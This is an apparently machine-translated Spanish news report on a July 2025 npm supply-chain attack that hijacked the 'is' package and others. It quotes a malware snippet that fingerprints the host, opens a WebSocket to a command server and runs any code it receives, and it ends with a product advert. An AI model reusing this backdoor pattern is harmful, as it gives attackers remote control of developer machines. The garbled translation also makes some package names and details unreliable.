La última ola de phishing centrada en NPM ha dado un giro más oscuro con el secuestro de la utilidad omnipresente IS, un módulo retirado 2,8 millones de veces por semana.
El 19 de julio de 2025, los atacantes, armados con credenciales del mantenedor robado, deslizaron las versiones maliciosas 3.3.1 y 5.0.0 en el registro, propagando sin problemas la puerta trasera a través de la resolución de dependencia ordinaria.
El mismo actor de amenaza envenenó simultáneamente a Eslint-Config-Stepertier, Got-Fetch y otros paquetes populares, lo que demuestra un asalto de cadena de suministro coordinado que recuerda a Solarwinds pero dirigido directamente a los desarrolladores de JavaScript.
Una vez dentro de un proyecto, el lanzamiento comprometido se ejecuta instantáneamente en macOS, Linux y Windows, distinguiéndolo de la DLL solo con Windows incrustada en el contenido de capas de eslint-Config-protegir.
Socket.dev analistas identificado Un cargador JavaScript muy ofuscado que reconstruye su carga útil en la memoria, sin dejar artefactos legibles por humanos en el disco.
Su telemetría muestra los nombres de host de cosecha de malware, los detalles del sistema operativo, los datos de la CPU y cada variable en el proceso.
Cargador JavaScript muy observado (fuente – Socket.dev)
Mientras esto captura el Beacon Live en tránsito. Las consecuencias ya son tangibles: un desarrollador informó banderas de seguridad de Chrome, reemplazo de SSD forzados y rotación de credenciales mayoristas después de descubrir que el Infente de Infente
Debido a que el malware sobrescribe su propio índice.js, los comandos simples de desinstalación de NPM no logran erradicar la amenaza; Los archivos de bloqueo deben purgarse y los ambientes reconstruidos de fuentes limpias.
Mecanismo de infección
En el corazón del ataque se encuentra un fragmento minimalista pero potente insertado en la parte superior del punto de entrada del paquete.
Después de exponer el requisito interno de Node a través de un getter engañoso, el código importa dinámicamente la biblioteca WS, abre un websocket encriptado, huellas digitales el host y luego ejecuta cualquier JavaScript transmitido desde el C2, otorgando efectivamente al adversario un shell interactivo.
Obtener “Switch” () {return require; } // omitir contexts restringidos const OS = this.switch (“OS”); const ws = this.switch (“ws”); constante const = nuevo ws (“wss: //”); Sock.Onopen = () => Sock.send (json.stringify ({host: OS.hostName (), plat: OS.platform (), cwd: process.cwd ()})); sock.onmessage = ({data}) => {nueva función (data) (); }; // rce
Esta cadena de ejecución en memoria de los motores de análisis estático y persiste reescribiendo a sí mismo, asegurando que el paquete comprometido sigue siendo una bomba de tiempo mucho después de la instalación inicial.
Experimenta una detección de phishing más rápida y precisa y una protección mejorada para su negocio con análisis de sandbox en tiempo real-> Prueba cualquiera.
